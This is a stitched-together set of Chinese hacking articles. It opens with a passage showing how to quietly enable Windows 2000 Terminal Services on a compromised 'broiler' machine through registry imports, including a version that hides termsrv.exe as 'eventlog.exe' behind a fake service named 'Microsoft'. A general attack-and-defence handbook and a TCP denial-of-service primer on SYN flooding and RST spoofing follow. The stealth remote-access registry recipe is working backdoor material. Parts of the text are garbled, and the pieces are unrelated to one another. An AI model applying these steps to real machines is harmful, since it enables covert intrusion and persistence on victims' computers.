[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]
"Start"=dword:00000002

[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
"Hotkey"="1"

-----------
2.重新起动"肉机"。

3.使用本地的3398客户端，连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:winntsystem32termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:winntsystem32"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
"Start"=dword:00000002

[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端，连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:winntinf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:winntinf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:winntinflayout.inf",你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?

网络常见攻击及防范手册（上）


一、前言

　　在网络这个不断更新换代的世界里，网络中的安全漏洞无处不在。即便旧的安全漏洞补上了，新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏 洞和安全缺陷对系统和资源进行攻击。

　　也许有人会对网络安全抱着无所谓的态度，认为最多不过是被攻击者盗用账号，造不成多大的危害。他们往往会认为“安全”只是针对那些大中型企事业单位和网站而言。其实，单从技术上说，黑客入侵的动机是成为目标主机的主人。只要他们获得了一台网络主机的超级用户权限后他们就有可能在该主机上修改资源配置、安置“特洛伊”程序、隐藏行踪、执行任意进程等等。我们谁又愿意别人在我们的机器上肆无忌惮地拥有这些特权呢？更何况这些攻击者的动机也不都是那么单纯。因此，我们每一个人都有可能面临着安全威胁，都有必要对网络安全有所了解，并能够处理一些安全方面的问题。

　　下面我们就来看一下那些攻击者是如何找到你计算机中的安全漏洞的，并了解一下他们的攻击手法。

　　二、网络攻击的步骤

　　第一步：隐藏自已的位置

　　普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用800电话的无人转接服务联接ISP，然后再盗用他人的帐号上网。

　　第二步：寻找目标主机并分析目标主机

　　攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址，域名是为了便于记忆主机的IP地址而另起的名字，只要利用域名和IP地址就可以顺利地找到目标主机。当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。此时，攻击者们会使用一些扫描器工具，轻松获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料，为入侵作好充分的准备。

　　第三步：获取帐号和密码，登录主机

　　攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻觅合适时机以此身份进入主机。当然，利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

　　第四步：获得控制权

　　攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后，就会做两件事：清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序，以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的，只需要想办法修改时间和权限就可以使用了，甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件，以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后，攻击者就开始下一步的行动。

　　第五步：窃取网络资源和特权

　　攻击者找到攻击目标后，会继续下一步的攻击。如：下载敏感信息；实施窃取帐号密码、信用卡号等经济偷窃；使网络瘫痪。

三、网络攻击的原理和手法

　　1、口令入侵

　　所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机，然后再实施攻击活动。这种方法的前提是必须先得到该主机上的某个合法用户的帐号，然后再进行合法用户口令的破译。获得普通用户帐号的方法很多，如

　　利用目标主机的Finger功能：当用Finger命令查询时，主机系统会将保存的用户资料（如用户名、登录时间等）显示在终端或计算机上；
　　利用目标主机的X.500服务：有些主机没有关闭X.500的目录查询服务，也给攻击者提供了获得信息的一条简易途径；
　　从电子邮件地址中收集：有些用户电子邮件地址常会透露其在目标主机上的帐号；
　　查看主机是否有习惯性的帐号：有经验的用户都知道，很多系统会使用一些习惯性的帐号，造成帐号的泄露。

　　这又有三种方法：

　　(1)是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大。监听者往往采用中途截击的方法也是获取用户帐户和密码的一条有效途径。当下，很多协议根本就没有采用任何加密或身份认证技术，如在Telnet、FTP、HTTP、SMTP等传输协议中，用户帐户和密码信息都是以明文格式传输的，此时若攻击者利用数据包截取工具便可很容易收集到你的帐户和密码。还有一种中途截击攻击方法更为厉害，它可以在你同服务器端完成“三次握手”建立连接之后，在通信过程中扮演“第三者”的角色，假冒服务器身份欺骗你，再假冒你向服务器发出恶意请求，其造成的后果不堪设想。另外，攻击者有时还会利用软件和硬件工具时刻监视系统主机的工作，等待记录用户登录信息，从而取得用户密码；或者编制有缓冲区溢出错误的SUID程序来获得超级用户权限。

　　(2)是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但攻击者要有足够的耐心和时间。如：采用字典穷举法（或称暴力法）来破解用户的密码。攻击者可以通过一些工具程序，自动地从电脑字典中取出一个单词，作为用户的口令，再输入给远端的主机，申请进入系统；若口令错误，就按序取出下一个单词，进行下一个尝试，并一直循环下去，直到找到正确的口令或字典的单词试完为止。由于这个破译过程由计算机程序来自动完成，因而几个小时就可以把上十万条记录的字典里所有单词都尝试一遍。

　　(3)是利用系统管理员的失误。在现代的Unix操作系统中，用户的基本信息存放在passwd文件中，而所有的口令则经过DES加密方法加密后专门存放在一个叫shadow的文件中。黑客们获取口令文件后，就会使用专门的破解DES加密法的程序来解口令。同时，由于为数不少的操作系统都存在许多安全漏洞、Bug或一些其他设计缺陷，这些缺陷一旦被找出，黑客就可以长驱直入。例如，让Windows95／98系统后门洞开的BO就是利用了Windows的基本设计缺陷。
2、放置特洛伊木马程序

　　特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时，这个程序就会通知攻击者，来报告您的IP地址以及预先设定的端口。攻击者在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改你的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

　　3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

　　一般Web欺骗使用两种技术手段，即URL地址重写技术和相关信关信息掩盖技术。利用URL地址，使这些地址都向攻击者的Web服务器，即攻击者可以将自已的Web地址加在所有URL地址的前面。这样，当用户与站点进行安全链接时，就会毫不防备地进入攻击者的服器，于是用记的所有信息便处于攻击者的监视之中。但由于浏览器材一般均设有地址栏和状态栏，当浏览器与某个站点边接时，可以在地址栏和状态样中获得连接中的Web站点地址及其相关的传输信息，用户由此可以发现问题，所以攻击者往往在URLf址重写的同时，利用相关信息排盖技术，即一般用javascript程序来重写地址样和状枋样，以达到其排盖欺骗的目的。

　　4、电子邮件攻击

　　电子邮件是互联网上运用得十分广泛的一种通讯方式。攻击者可以使用一些邮件炸弹软件或CGI程序向目的邮箱发送大量内容重复、无用的垃圾邮件，从而使目的邮箱被撑爆而无法使用。当垃圾邮件的发送流量特别大时，还有可能造成邮件系统对于正常的工作反映缓慢，甚至瘫痪。相对于其它的攻击手段来说，这种攻击方法具有简单、见效快等优点。

　　电子邮件攻击主要表现为两种方式：

　　(1)是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；

　　(2)是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序。
5、通过一个节点来攻击其他节点

　　攻击者在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。

　　这类攻击很狡猾，但由于某些技术很难掌握，如TCP／IP欺骗攻击。攻击者通过外部计算机伪装成另一台合法机器来实现。它能磙坏两台机器间通信链路上的数据，其伪装的目的在于哄骗网络中的其它机器误将其攻击者作为合法机器加以接受，诱使其它机器向他发送据或允许它修改数据。TCP／IP欺骗可以发生TCP／IP系统的所有层次上，包括数据链路层、网络层、运输层及应用层均容易受到影响。如果底层受到损害，则应用层的所有协议都将处于危险之中。另外由于用户本身不直接与底层相互相交流，因而对底层的攻击更具有欺骗性。

网络常见攻击及防范手册（下）


　6、网络监听

　　网络监听是主机的一种工作模式，在这种模式下，主机可以接收到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接收方是谁。因为系统在进行密码校验时，用户输入的密码需要从用户端传送到服务器端，而攻击者就能在两端之间进行数据监听。此时若两台主机进行通信的信息没有加密，只要使用某些网络监听工具(如NetXRay for Windows95／98／NT、Sniffit for Linux、Solaries等)就可轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

　　7、利用黑客软件攻击

　　利用黑客软件攻击是互联网上比较多的一种攻击手法。Back Orifice2000、冰河等都是比较著名的特洛伊木马，它们可以非法地取得用户电脑的超级用户级权利，可以对其进行完全的控制，除了可以进行文件操作外，同时也可以进行对方桌面抓图、取得密码等操作。这些黑客软件分为服务器端和用户端，当黑客进行攻击时，会使用用户端程序登陆上已安装好服务器端程序的电脑，这些服务器端程序都比较小，一般会随附带于某些软件上。有可能当用户下载了一个小游戏并运行时，黑客软件的服务器端就安装完成了，而且大部分黑客软件的重生能力比较强，给用户进行清除造成一定的麻烦。特别是最近出现了一种TXT文件欺骗手法，表面看上去是一个TXT文本文件，但实际上却是一个附带黑客程序的可执行程序，另外有些程序也会伪装成图片和其他格式的文件。

　　8、安全漏洞攻击

　　许多系统都有这样那样的安全漏洞（Bugs）。其中一些是操作系统或应用软件本身具有的。如缓冲区溢出攻击。由于很多系统在不检查程序与缓冲之间变化的情况，就任意接受任意长度的数据输入，把溢出的数据放在堆栈里，系统还照常执行命令。这样攻击者只要发送超出缓冲区所能处理的长度的指令，系统便进入不稳定状态。若攻击者特别配置一串准备用作攻击的字符，他甚至可以访问根目录，从而拥有对整个网络的绝对控制权。另一些是利用协议漏洞进行攻击。如攻击者利用POP3一定要在根目录下运行的这一漏洞发动攻击，破坏的根目录，从而获得超级用户的权限。又如，ICMP协议也经常被用于发动拒绝服务攻击。它的具体手法就是向目的服务器发送大量的数据包，几乎占取该服务器所有的网络宽带，从而使其无法对正常的服务请求进行处理，而导致网站无法进入、网站响应速度大大降低或服务器瘫痪。现在常见的蠕虫病毒或与其同类的病毒都可以对服务器进行拒绝服务攻击的进攻。它们的繁殖能力极强，一般通过Microsoft的Outlook软件向众多邮箱发出带有病毒的邮件，而使邮件服务器无法承担如此庞大的数据处理量而瘫痪。对于个人上网用户而言，也有可能遭到大量数据包的攻击使其无法进行正常的网络操作。

　　9、端口扫描攻击

　　所谓端口扫描，就是利用Socket编程与目标主机的某些端口建立TCP连接、进行传输协议的验证等，从而侦知目标主机的扫描端口是否是处于激活状态、主机提供了哪些服务、提供的服务中是否含有某些缺陷等等。常用的扫描方式有：Connect()扫描。Fragmentation扫描
四、攻击者常用的攻击工具

　　1、DOS攻击工具：

　　如WinNuke通过发送OOB漏洞导致系统蓝屏；Bonk通过发送大量伪造的UDP数据包导致系统重启；TearDrop通过发送重叠的IP碎片导致系统的TCP/IP栈崩溃；WinArp通过发特殊数据包在对方机器上产生大量的窗口；Land通过发送大量伪造源IP的基于SYN的TCP请求导致系统重启动；FluShot通过发送特定IP包导致系统凝固；Bloo通过发送大量的ICMP数据包导致系统变慢甚至凝固；PIMP通过IGMP漏洞导致系统蓝屏甚至重新启动；Jolt通过大量伪造的ICMP和UDP导致系统变的非常慢甚至重新启动。

　　2、木马程序

　　(1)、BO2000(BackOrifice)：它是功能最全的TCP／IP构架的攻击工具，可以搜集信息，执行系统命令，重新设置机器，重新定向网络的客户端／服务器应用程序。BO2000支持多个网络协议，它可以利用TCP或UDP来传送，还可以用XOR加密算法或更高级的3DES加密算法加密。感染BO2000后机器就完全在别人的控制之下，黑客成了超级用户，你的所有操作都可由BO2000自带的“秘密摄像机”录制成“录像带”。

　　(2)、“冰河”：冰河是一个国产木马程序，具有简单的中文使用界面，且只有少数流行的反病毒、防火墙才能查出冰河的存在。冰河的功能比起国外的木马程序来一点也不逊色。 它可以自动跟踪目标机器的屏幕变化，可以完全模拟键盘及鼠标输入，即在使被控端屏幕变化和监控端产生同步的同时，被监控端的一切键盘及鼠标操作将反映在控端的屏幕。它可以记录各种口令信息，包括开机口令、屏保口令、各种共享资源口令以及绝大多数在对话框中出现过的口令信息；它可以获取系统信息；它还可以进行注册表操作，包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作。

　　(3)、NetSpy：可以运行于Windows95／98／NT／2000等多种平台上，它是一个基于TCP／IP的简单的文件传送软件，但实际上你可以将它看作一个没有权限控制的增强型FTP服务器。通过它，攻击者可以神不知鬼不觉地下载和上传目标机器上的任意文件，并可以执行一些特殊的操作。

　　(4)、Glacier：该程序可以自动跟踪目标计算机的屏幕变化、获取目标计算机登录口令及各种密码类信息、获取目标计算机系统信息、限制目标计算机系统功能、任意操作目标计算机文件及目录、远程关机、发送信息等多种监控功能。类似于BO2000。

　　(5)、KeyboardGhost：Windows系统是一个以消息循环(MessageLoop)为基础的操作系统。系统的核心区保留了一定的字节作为键盘输入的缓冲区，其数据结构形式是队列。键盘幽灵正是通过直接访问这一队列，使键盘上输入你的电子邮箱、代理的账号、密码Password（显示在屏幕上的是星号）得以记录，一切涉及以星号形式显示出来的密码窗口的所有符号都会被记录下来，并在系统根目录下生成一文件名为KG.DAT的隐含文件。

　　(6)、ExeBind：这个程序可以将指定的攻击程序捆绑到任何一个广为传播的热门软件上，使宿主程序执行时，寄生程序也在后台被执行，且支持多重捆绑。实际上是通过多次分割文件，多次从父进程中调用子进程来实现的。
五、网络攻击应对策略

　　在对网络攻击进行上述分析与识别的基础上，我们应当认真制定有针对性的策略。明确安全对象，设置强有力的安全保障体系。有的放矢，在网络中层层设防，发挥网络的每层作用，使每一层都成为一道关卡，从而让攻击者无隙可钻、无计可使。还必须做到未雨稠缪，预防为主 ，将重要的数据备份并时刻注意系统运行状况。以下是针对众多令人担心的网络安全问题，提出的几点建议

　　1、提高安全意识

　　(1)不要随意打开来历不明的电子邮件及文件，不要随便运行不太了解的人给你的程序，比如“特洛伊”类黑客程序就需要骗你运行。
　　(2)尽量避免从Internet下载不知名的软件、游戏程序。即使从知名的网站下载的软件也要及时用最新的病毒和木马查杀软件对软件和系统进行扫描。
　　(3)密码设置尽可能使用字母数字混排，单纯的英文或者数字很容易穷举。将常用的密码设置不同，防止被人查出一个，连带到重要密码。重要密码最好经常更换。
　　(4)及时下载安装系统补丁程序。
　　(5)不随便运行黑客程序，不少这类程序运行时会发出你的个人信息。
　　(6)在支持HTML的BBS上，如发现提交警告，先看源代码，很可能是骗取密码的陷阱。

　　2、使用防毒、防黑等防火墙软件。

　　防火墙是一个用以阻止网络中的黑客访问某个机构网络的屏障，也可称之为控制进/出两个方向通信的门槛。在网络边界上通过建立起来的相应网络通信监控系统来隔离内部和外部网络，以阻档外部网络的侵入。

　　3、设置代理服务器，隐藏自已的IP地址。

　　保护自己的IP地址是很重要的。事实上，即便你的机器上被安装了木马程序，若没有你的IP地址，攻击者也是没有办法的，而保护IP地址的最好方法就是设置代理服务器。代理服务器能起到外部网络申请访问内部网络的中间转接作用，其功能类似于一个数据转发器，它主要控制哪些用户能访问哪些服务类型。当外部网络向内部网络申请某种网络服务时，代理服务器接受申请，然后它根据其服务类型、服务内容、被服务的对象、服务者申请的时间、申请者的域名范围等来决定是否接受此项服务，如果接受，它就向内部网络转发这项请求。

　　4、将防毒、防黑当成日常例性工作，定时更新防毒组件，将防毒软件保持在常驻状态，以彻底防毒。

　　5、由于黑客经常会针对特定的日期发动攻击，计算机用户在此期间应特别提高警戒。

　　6、对于重要的个人资料做好严密的保护，并养成资料备份的习惯。

DOS攻击原理及方法介绍


已经有很多介绍DOS（Denial of Service，即拒绝服务）攻击的文章，但是，多数人还是不知道DOS到底是什么，它到底是怎么实现的。本文主要介绍DOS的机理和常见的实施方法。因前段时间仔细了解了TCP/IP协议以及RFC文档，有点心得。同时，文中有部分内容参考了Shaft的文章翻译而得
。要想了解DOS攻击得实现机理，必须对TCP有一定的了解。所以，本文分为两部分，第一部分介绍一
些实现DOS攻击相关的协议，第二部分则介绍DOS的常见方式。

1、 什么是DOS攻击
DOS：即Denial Of Service，拒绝服务的缩写，可不能认为是微软的dos操作系统了。好象在5·1的时候闹过这样的笑话。拒绝服务，就相当于必胜客在客满的时候不再让人进去一样，呵呵，你想吃馅饼，就必须在门口等吧。DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问，这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。比如：
* 试图FLOOD服务器，阻止合法的网络通?br>* 破坏两个机器间的连接，阻止访问服务
* 阻止特殊用户访问服务
* 破坏服务器的服务或者导致服务器死机
不过，只有那些比较阴险的攻击者才单独使用DOS攻击，破坏服务器。通常，DOS攻击会被作为一次入侵的一部分，比如，绕过入侵检测系统的时候，通常从用大量的攻击出发，导致入侵检测系统日志过多或者反应迟钝，这样，入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

2、有关TCP协议的东西
TCP（transmission control protocol，传输控制协议），是用来在不可靠的因特网上提供可靠的、端到端的字节流通讯协议，在RFC793中有正式定义，还有一些解决错误的东西在RFC 1122中有记录，RFC 1323则有TCP的功能扩展。

我们常见到的TCP/IP协议中，IP层不保证将数据报正确传送到目的地，TCP则从本地机器接受用户的数据流，将其分成不超过64K字节的数据片段，将每个数据片段作为单独的IP数据包发送出去，最后在目的地机器中再组合成完整的字节流，TCP协议必须保证可靠性。

发送和接收方的TCP传输以数据段的形式交换数据，一个数据段包括一个固定的20字节头，加上可选部分，后面再跟上数据，TCP协议从发送方传送一个数据段的时候，还要启动计时器，当数据段到达目的地后，接收方还要发送回一个数据段，其中有一个确认序号，它等于希望收到的下一个数据段的顺序号，如果计时器在确认信息到达前超时了，发送方会重新发送这个数据段。

上面，我们总体上了解一点TCP协议，重要的是要熟悉TCP的数据头（header）。因为数据流的传输最重要的就是header里面的东西，至于发送的数据，只是header附带上的。客户端和服务端的服务响应就是同header里面的数据相关，两端的信息交流和交换是根据header中的内容实施的，因此，要实现DOS，就必须对header中的内容非常熟悉。

下面是TCP数据段头格式。
Source Port和 Destination Port :是本地端口和目标端口
Sequence Number 和 Acknowledgment Number ：是顺序号和确认号，确认号是希望接收的字节号。这都是32位的，在TCP流中，每个数据字节都被编号。Data offset :表明TCP头包含多少个32位字，用来确定头的长度，因为头中可选字段长度是不定的。Reserved : 保留的我不是人，现在没用，都是0
接下来是6个1位的标志，这是两个计算机数据交流的信息标志。接收和发送断根据这些标志来确定信息流的种类。下面是一些介绍： URG：（Urgent Pointer field significant）紧急指针。用到的时候值为1，用来处理避免TCP数据流中断ACK：（Acknowledgment field significant）置1时表示确认号（Acknowledgment Number）为合法，为0的时候表示数据段不包含确认信息，确认号被忽略。
PSH：（Push Function），PUSH标志的数据，置1时请求的数据段在接收方得到后就可直接送到应用程序，而不必等到缓冲区满时才传送。
RST：（Reset the connection）用于复位因某种原因引起出现的错误连接，也用来拒绝非法数据和请求。如果
接收到RST位时候，通常发生了某些错误。
SYN：（Synchronize sequence numbers）用来建立连接，在连接请求中，SYN=1，CK=0，连接响应时，SYN=1，
ACK=1。即，SYN和ACK来区分Connection Request和Connection Accepted。
FIN：（No more data from sender）用来释放连接，表明发送方已经没有数据发送。

知道这重要的6个指示标志后，我们继续来。
1我不是人的WINDOW字段：表示确认了字节后还可以发送多少字节。可以为0，表示已经收到包括确认号减1（即已发送所有数据）
在内的所有数据段。
接下来是1我不是人的Checksum字段，用来确保可靠性的。
1我不是人的Urgent Pointer，和下面的字段我们这里不解释了。不然太多了。呵呵，偷懒啊。

我们进入比较重要的一部分：TCP连接握手过程。这个过程简单地分为三步。在没有连接中，接受方（我们针对服务器），服务器处于LISTEN状态，等待其他机器发送连接请求。
第一步：客户端发送一个带SYN位的请求，向服务器表示需要连接，比如发送包假设请求序号为10，那么则为：SYN=10，ACK=0，然后等待服务器的响应。
第二步：服务器接收到这样的请求后，查看是否在LISTEN的是指定的端口，不然，就发送RST=1应答，拒绝建立连接。如果接收连接，那么服务器发送确认，SYN为服务器的一个内码，假设为100，ACK位则是客户端的请求序号加1，本例中发送的数据是：SYN=100，ACK=11，用这样的数据发送给客户端。向客户端表示，服务器连接已经准备好了，等待客户端的确认这时客户端接收到消息后，分析得到的信息，准备发送确认连接信号到服务器
第三步：客户端发送确认建立连接的消息给服务器。确认信息的SYN位是服务器发送的ACK位，ACK位是服务器发送的SYN位加1。即：SYN=11，ACK=101。
这时，连接已经建立起来了。然后发送数据，<SYN=11，ACK=101><DATA>。这是一个基本的请求和连接过程。需要注意的是这些标志位的关系，比如SYN、ACK。

3、服务器的缓冲区队列（Backlog Queue）
服务器不会在每次接收到SYN请求就立刻同客户端建立连接，而是为连接请求分配内存空间，建立会话，并放到一个等待队列中。如果，这个等待的队列已经满了，那么，服务器就不在为新的连接分配任何东西，直接丢弃新的请求。如果到了这样的地步，服务器就是拒绝服务了。
如果服务器接收到一个RST位信息，那么就认为这是一个有错误的数据段，会根据客户端IP，把这样的连接在缓冲区队列中清除掉。这对IP欺骗有影响，也能被利用来做DOS攻击。

####################################################################

上面的介绍，我们了解TCP协议，以及连接过程。要对SERVER实施拒绝服务攻击，实质上的方式就是有两个：
一， 迫使服务器的缓冲区满，不接收新的请求。
二， 使用IP欺骗，迫使服务器把合法用户的连接复位，影响合法用户的连接
这就是DOS攻击实施的基本思想。具体实现有这样的方法：

1、SYN FLOOD
利用服务器的连接缓冲区（Backlog Queue），利用特殊的程序，设置TCP的Header，向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候，都认为是没有建立起来的连接请求，于是为这些请求建立会话，排到缓冲区队列中。
如果你的SYN请求超过了服务器能容纳的限度，缓冲区队列满，那么服务器就不再接收新的请求了。其他合法用户的连接都被拒绝掉。可以持续你的SYN请求发送，直到缓冲区中都是你的只有SYN标记的请求。现在有很多实施SYN FLOOD的工具，呵呵，自己找去吧。

2、IP欺骗DOS攻击
这种攻击利用RST位来实现。假设现在有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接，攻击者构造攻击的TCP数据，伪装自己的IP为1.1.1.1，并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后，认为从1.1.1.1发送的连接有错误，就会清空缓冲区中建立好的连接。这时，如果合法用户1.1.1.1再发送合法数据，服务器就已经没有这样的连接了，该用户就必
须从新开始建立连接。攻击时，伪造大量的IP地址，向目标发送RST数据，使服务器不对合法用户服务。

3、 带宽DOS攻击
如果你的连接带宽足够大而服务器又不是很大，你可以发送请求，来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大了，配合上SYN一起实施DOS，威力巨大。不过是初级DOS攻击。呵呵。Ping白宫？？你发疯了啊！


4、自身消耗的DOS攻击
这是一种老式的攻击手法。说老式，是因为老式的系统有这样的自身BUG。比如Win95 (winsock v1), Cisco IOS v.10.x, 和其他过时的系统。
这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同，发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快把资源消耗光。直接导致当机。这中伪装对一些身份认证系统还是威胁巨大的。
上面这些实施DOS攻击的手段最主要的就是构造需要的TCP数据，充分利用TCP协议。这些攻击方法都是建立在TCP基础上的。还
有其他的DOS攻击手段。

5、塞满服务器的硬盘
通常，如果服务器可以没有限制地执行写操作，那么都能成为塞满硬盘造成DOS攻击的途径，比如：
